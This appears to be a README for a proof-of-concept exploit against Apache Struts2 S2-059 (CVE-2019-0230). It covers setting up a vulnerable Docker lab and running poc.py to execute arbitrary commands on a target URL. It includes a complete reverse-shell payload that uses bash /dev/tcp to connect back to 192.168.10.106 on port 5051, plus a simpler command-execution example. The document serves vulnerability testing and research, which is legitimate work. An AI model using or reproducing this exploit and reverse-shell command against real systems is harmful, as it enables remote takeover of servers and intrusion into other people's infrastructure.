CVE-2019-0230_Struts2S2-059

How to use

Build Struts252-059 Docker

docker-compose up -d

How To Use

python3 poc.py "URL" "shell"

Example(PoC)：

python3 poc.py http://127.0.0.1:8080 "touch /tmp/1234"

Example(PoC)-2_Reverse Shell：

python3 poc.py http://127.0.0.1:8080 "0<&196;exec 196<>/dev/tcp/192.168.10.106/5051; sh <&196 >&196 2>&196"

Reference

1. Struts2 S2-059 Remote Code Execution Vulnerablity(CVE-2019-0230)
2. struts2 s2-059远程代码执行漏洞（CVE-2019-0230）
3. java.lang.Runtime.exec() Payload Workarounds